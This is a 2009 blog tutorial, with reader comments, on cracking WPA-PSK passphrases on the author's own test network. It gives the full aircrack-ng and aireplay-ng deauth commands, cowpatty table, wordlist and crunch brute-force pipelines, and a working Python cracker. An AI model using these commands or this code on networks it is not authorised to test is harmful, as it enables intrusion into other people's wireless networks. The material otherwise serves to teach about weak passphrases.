Tuesday 28 July 2009

Back on Track to Backtrack - WPA cracking

So, after having lived a couple of weeks without my eeePC, I could take it no longer and got myself a new toy.
A Samsung N110, pretty sweet. I actually did go for the Windows XP version; whatever you say about Windows, it is usually handy to have, and when I need Linux I just boot up the live USB.

The only small gripe I have is that the BIOS does not allow booting from an SD card, which is kind of annoying, but I have a tiny 8 GB USB drive, so it's OK. It's just that the eeePC seemed to be more versatile out of the box.. oh well, no worries, it works!

When BT4 is finalised I'll probably do a dual boot HDD install, but waiting with that for the moment :)

So anyway, back on track to backtrack ..

In previous posts I looked at wireless networks, WEP encrypted networks in particular, and at how dangerously weak WEP is.
That was all done with BackTrack 3 Final.

Important to note: everything below was done using BackTrack 4 Pre Final.

Now it is time to look at WPA and WPA2 protected networks, which are normally the ones you will see the most.

I have set up a test network using my Asus router as follows:

essid : default
Encryption : WPA-PSK
No MAC filtering
DHCP enabled

So the point of this is to demonstrate the problem with people using weak passphrases for their WPA protected networks: nothing in the encryption itself gets broken here, the passphrase simply gets guessed.

For this example we will use coWPAtty, a program made to recover WPA(2)-PSK passphrases using either "rainbow tables" (strictly, lookup tables of precomputed PMKs rather than true rainbow tables) or plain wordlists.
Granted, this does not catch everything, but it does catch the incautious.

With a wordlist, for every candidate the program has to combine the ESSID with the passphrase (PBKDF2 with HMAC-SHA1, 4096 rounds, the ESSID being the salt) to produce the PMK, derive the session key from that together with the MACs and nonces seen in the captured handshake, and check whether the resulting MIC matches the one the client sent. The PBKDF2 step is what makes this slow.
The advantage of the tables is that they already hold the PMK for every word in the list (when you actually have the tables, that is..), so only the cheap check remains. The catch is that the PMK depends on the ESSID, so a table is only good for the single ESSID it was generated for.

Tables have already been generated for some of the most commonly seen ESSIDs, using a 49 million word dictionary, for use with coWPAtty; http://www.offensive-security.com/wpa-tables/

So what we need to do is the following
> Identify our target network
> Verify whether any clients are associated to the network
> If no clients are associated.. wait..
> If clients are associated, deauth one and capture the 4-way handshake
> Use this 4-way handshake with cowpatty to crack the network's WPA passphrase.

Identifying target

Start the interface in monitor mode and fire up airodump. Since I know my network is a WPA network on channel 1, I start airodump with filters for those;

airmon-ng start wlan0
airodump-ng mon0 -c 1 -t WPA

airodump then lists the target we are after.

After identifying the network, I restart airodump with the BSSID specified, writing everything it captures to file (here with 'default' as the filename prefix, so the capture ends up in default-01.cap), and wait for a client to connect.

airodump-ng mon0 -c 1 -t WPA --bssid 00:13:D4:09:32:60 -w default

When a client associates and the 4-way handshake is captured, airodump shows 'WPA handshake: 00:13:D4:09:32:60' in the top right corner of its display; at that point I no longer need airodump and can continue.

If a client is already connected to the AP, we can deauthenticate it and force it to reconnect, which gives us the 4-way handshake we need. Note that the deauth only makes the client reconnect; the handshake itself is captured by the airodump session, which must still be running on the same channel.
In a separate console;
aireplay-ng mon0 -0 5 -a 00:13:D4:09:32:60 -c 00:1F:3C:8C:D9:71

Now we need the WPA table for this ESSID handy for the crack, so use the link above for tables or make your own (genpmk, shipped with coWPAtty, builds one from a wordlist and an ESSID).

Start up cowpatty and enter the information as necessary.
(All the details below are specific to my setup; change them to suit your needs.)

In this case (in cowpatty console);

./cowpatty -d /media/disk/WPA_tables/default.wpa -r ~/default-01.cap -s default

[Screenshots of cowpatty when starting and when done, not reproduced here.]

So, as the screenshot showed, the passphrase is butterfly and the program went through over 45,000 passphrases per second.. pretty good! With the PMKs precomputed, each candidate only costs the PTK derivation and one MIC check, which is where that rate comes from.

Doing the exact same crack, but with just the dictionary file the tables were made from, the only thing that changes is how cowpatty is started.
You still need the handshake with the AP and the ESSID, then proceed as follows (in my case the wordlist lives in /media/disk/WORDLISTS/);

./cowpatty -f /media/disk/WORDLISTS/wpalist.txt -r ~/default-01.cap -s default

I didn't have the patience to let it run its course.. it was only doing 34 passphrases a second, and at that rate the 49 million word list would take a looong time (over two weeks)! However, given time and patience, a lot can be done.
Remember this was done on a Samsung N110 with 2 GB of RAM; on a better machine the rate would be higher, but the 4096 rounds of PBKDF2 per candidate are what keep wordlist mode so far behind the table lookup.

It is also possible to brute-force the passphrase by generating candidates with crunch and piping them into cowpatty (-f - makes cowpatty read its wordlist from stdin).

For instance, there is a telecom provider here that issued a WPA key along with its router that was always 8 characters long and made up only of digits and the upper case letters A to F, i.e. 8 hex characters, a keyspace of 16^8 (about 4.3 billion) candidates.

In that case, if we were feeling patient, we could run crunch with the known character set and length and pipe the output to cowpatty as follows;

/pentest/passwords/crunch/./crunch 8 8 0123456789ABCDEF | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/capfile.cap -s essid

I can do something similar in my case using the letters of butterfly (b, u, t, e, r, f, l, y) as the character set, since I know those are the only characters in the passphrase, and to speed things up fixing the first 5 characters with a crunch pattern (-t, where each @ is filled from the character set);

/pentest/passwords/crunch/./crunch 9 9 buterfly -t butte@@@@ | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/default-01.cap -s default -v
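To make the hash mechanics concrete, here is an added example of what the wordlist run, the table lookup and the crunch pipe above all drive: PBKDF2 from passphrase and ESSID to the PMK, the 802.11i PRF to the key confirmation key, and the MIC check against the client's EAPOL-Key message. It is my own Python, not code from coWPAtty, genpmk, crunch or this post. The capture data is constructed: the MACs are the ones used above, the nonces and the EAPOL frame are invented, and the target MIC is computed from 'butterfly' so the script runs without a .cap file; names such as crack_wordlist, build_pmk_table and mask_candidates are mine.

```python
import hashlib
import hmac
import itertools
from dataclasses import dataclass
from typing import Dict, Iterable, Optional


def pmk(passphrase: str, ssid: str) -> bytes:
    """Passphrase -> PMK: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes. The slow
    step; it depends only on passphrase and SSID, so a table for one SSID fits no other."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck(pmk_: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 128 bits of the PTK (the Key Confirmation Key) from the 802.11i PRF:
    HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || min/max MACs || min/max nonces || i)."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    return hmac.new(pmk_, b"Pairwise key expansion\x00" + data + b"\x00", hashlib.sha1).digest()[:16]


def eapol_mic(kck_: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed. Key descriptor version 1
    (WPA/TKIP) is HMAC-MD5, version 2 (WPA2/CCMP) is HMAC-SHA1 cut to 16 bytes."""
    return hmac.new(kck_, eapol, hashlib.md5 if version == 1 else hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    ssid: str
    ap: bytes       # BSSID
    sta: bytes      # client MAC
    anonce: bytes   # nonce from message 1
    snonce: bytes   # nonce from message 2
    eapol: bytes    # message 2 EAPOL-Key frame with its MIC field zeroed
    mic: bytes      # MIC the client actually sent in message 2
    version: int = 2


def pmk_matches(hs: Handshake, candidate: bytes) -> bool:
    """The cheap half of the check: KCK derivation plus one HMAC, no PBKDF2."""
    mic = eapol_mic(kck(candidate, hs.ap, hs.sta, hs.anonce, hs.snonce), hs.eapol, hs.version)
    return hmac.compare_digest(mic, hs.mic)


def crack_wordlist(hs: Handshake, candidates: Iterable[str]) -> Optional[str]:
    """What `cowpatty -f` does: PBKDF2 for every candidate, then the MIC check."""
    return next((w for w in candidates if pmk_matches(hs, pmk(w, hs.ssid))), None)


def build_pmk_table(words: Iterable[str], ssid: str) -> Dict[str, bytes]:
    """What genpmk does: precompute the PMKs for one SSID ahead of time."""
    return {w: pmk(w, ssid) for w in words}


def crack_with_table(hs: Handshake, table: Dict[str, bytes]) -> Optional[str]:
    """What `cowpatty -d` does: only the cheap check per table entry."""
    return next((w for w, p in table.items() if pmk_matches(hs, p)), None)


def mask_candidates(pattern: str, charset: str) -> Iterable[str]:
    """Like `crunch -t`: every '@' takes each character of charset in turn, the rest is fixed."""
    slots = [i for i, c in enumerate(pattern) if c == "@"]
    for combo in itertools.product(charset, repeat=len(slots)):
        chars = list(pattern)
        for i, c in zip(slots, combo):
            chars[i] = c
        yield "".join(chars)


# Constructed "capture" for ESSID 'default': the MACs are the ones from the post, the nonces
# and the EAPOL frame are made up here (in a real run they come out of the .cap), and the
# MIC is computed from the known passphrase so the example runs stand-alone.
AP_MAC, STA_MAC = bytes.fromhex("0013d4093260"), bytes.fromhex("001f3c8cd971")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
EAPOL_MSG2 = (b"\x01\x03\x00\x5f"            # 802.1X: version 1, type 3 (EAPOL-Key), body length 95
              + b"\x02\x01\x0a\x00\x10"       # RSN descriptor; key info: version 2, pairwise, MIC; key length 16
              + b"\x00" * 7 + b"\x01"         # replay counter 1
              + SNONCE + b"\x00" * 32         # SNonce; key IV, key RSC, key ID
              + b"\x00" * 16 + b"\x00\x00")   # MIC field zeroed; key data length 0
SAMPLE = Handshake("default", AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2,
                   eapol_mic(kck(pmk("butterfly", "default"), AP_MAC, STA_MAC, ANONCE, SNONCE), EAPOL_MSG2, 2))

if __name__ == "__main__":
    print(crack_wordlist(SAMPLE, ["123456", "password", "butterfly"]))
    print(crack_with_table(SAMPLE, build_pmk_table(["letmein", "butterfly"], "default")))
    print(crack_wordlist(SAMPLE, mask_candidates("butte@@@@", "buterfly")))  # the crunch mask from the post
```

Run stand-alone it recovers 'butterfly' by all three routes. build_pmk_table is the genpmk step, and feeding crack_with_table a table built for any ESSID other than 'default' finds nothing, which is the reason the downloadable tables are per-ESSID. Parsing a real .cap into a Handshake (ANonce from message 1, SNonce and the MIC from message 2) is left out here; cowpatty and aircrack-ng do that part.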


  1. your blog is really cool man, thanks for all

  2. Thanks ! Much appreciated ;)

  3. Bro, you are a genius.... really awesome work......!!!!
    Well, I have a few doubts...

    1: how can I send a deauth to the other client (I mean the code)..??

    2. how will I know whether I have a 4-way handshake..??

    3. how to make rainbow tables with a wordlist.

  4. Hey there, glad you liked the post.

    For your questions 1 & 2, the answers are clearly written in the blog!
    > Use 'aireplay-ng' for the deauthing of a client in order to obtain a 4-way handshake.
    > Use the airodump-ng session for capturing the 4-way handshake, when you have it, it will pop-up on the top right corner of airodump.

    As for creating your own rainbow tables, look into the tool 'genpmk' in the cowpatty directory.

  5. Tape, thanks for your reply.....

    As I'm a beginner to BackTrack Linux......
    can you provide me with the steps to create rainbow tables with 'genpmk'?


  6. Heya Daryl,

    The first step is to ensure you have a wordlist which you feel is the right one, lets call ours "wordlist.txt"

    Note the SSID for which you want to create the rainbow table (for instance "default").

    Then fire up backtrack and head over to cowpatty;
    cd /pentest/wireless/cowpatty/

    Start genpmk based on your wordlist and SSID ;
    ./genpmk -f wordlist.txt -d custom-table -s default

    -f for the wordlist you have to use to crack the wpa password
    -d being the output (rainbow table)
    -s being the SSID of your WPA network

    If you would like further info, I could consider a post on it if you like.
    But the above should get you going in the general direction.

    Be aware that it may take some time to generate the rainbow table and it may take up a lot of space.

    And remember, google can be a fantastic aid to nearly all things ;)

  7. Thank you very much for your reply, tape....
    It would be better if you made a detailed tutorial on it..!!


  8. In my opinion, this is good information. Good blog, good thinking; no wonder you want to share the information with the public, because you're a genius. I like it very much. If I'm having difficulties with networking, can you help me? Please.

  9. Where can I find a wordlist for WPA/2, or that table you mention? I'm from Greece and can't find a good list... or what if the router has the default password? Where can I find a list of default passwords for lots of routers? Please, can you help? Thanks.

  10. Hey there,

    Well, first use your google-fu... there are many wordlists out there.
    (A quick Google for Greek WPA2 wordlists proves this..)

    For a default password list for routers (as in gateways) try this site;

    If you are looking for default passwords for router/modem combinations issued by telcos, then you are out of luck. There is no list for this.

  11. You are a genius, thank you very much for this blog!!!

  12. Glad you like it and thanks for your post ;)

  13. Excellent. Please keep up the great work.


  14. Thanks :) will try to ;)

  15. fantastic blog...I'm learning from the ground up and this is an amazing blog!

  16. Thanks man :)

    Glad you like it and hope your learning goes well !

  17. Hello tape, I tried this "/pentest/passwords/crunch/./crunch 8 8 0123456789ABCDEF | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/capfile.cap -s essid" and afterwards the program says "no such devices in this file"..... If you want, tell me where I went wrong.. maybe I need to put in a dictionary? I have a WPA handshake and I want to use cowpatty to generate a table of passwords for this handshake.. please tell me what I need to do.. thanks and respect

  18. The general syntax seems correct enough; are you sure you are using the correct ESSID? Of course it must be the ESSID of your network.

    Also, you could try aircrack. Remember you are crunching through 36 gigabytes of data with this command, so it will take some time.. lols.. at 1000 passphrases a second, around 50 days :)

  19. Hello again, there's something wrong in this command because it doesn't work...."/pentest/passwords/crunch/./crunch 8 8 0123456789ABCDEF | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/capfile.cap -s essid". So you understand what I need.. I'll tell you: I need a solution without a dictionary. I see many solutions on YouTube but they don't work with cowpatty. I have BT5 GNOME installed on my computer; do I need to install cowpatty or another program... thanks for your reply.. tell me a solution without a dictionary, because I'm from Greece and it's difficult to find a good dictionary... bye bye, sorry for my English

  20. I repeat.. you are looking at weeks of work to go through that list.. but try this then.

    Make sure you enter the essid correctly and that the path to the .cap file is correct

    /pentest/passwords/crunch/crunch 8 8 0123456789ABCDEF | aircrack-ng -w - -e "Your SSID" /path/to/capfile.cap

    Now prepare yourself to watch paint dry...

  21. root@bt:~# /pentest/passwords/crunch/crunch 14 14 0123456789abcdefghklmnopqryzv | aircrack-ng -w - -e PR's KAFFE '/root/era-01.cap'
    "....I put something wrong, or... I must wait... because the program doesn't generate... sorry for my English, I hope you understand me"

  22. No, you are not completing the correct syntax, and this does not appear to be any test on your own network.

    No more help on this one.

  23. Hi, please help me, I have a problem. I want to capture the "WPA HANDSHAKE" but when I inject packets it doesn't give me the "WPA HANDSHAKE", why? This form: aireplay-ng -0 6 -a bssid -c mac client mon0.... is good, it sends packets, but why doesn't it give me the WPA handshake? Sorry for my English...

  24. I don't have a 'cowpatty' directory in '/pentest/wireless', what's wrong?

    1. Nothing is wrong; assuming you are using BT5, you can start cowpatty from any directory.

      just type;

  25. TAPE, you are my new religion!!!! Thanks for the tuts, man!!! Respect from Bulgaria!!!

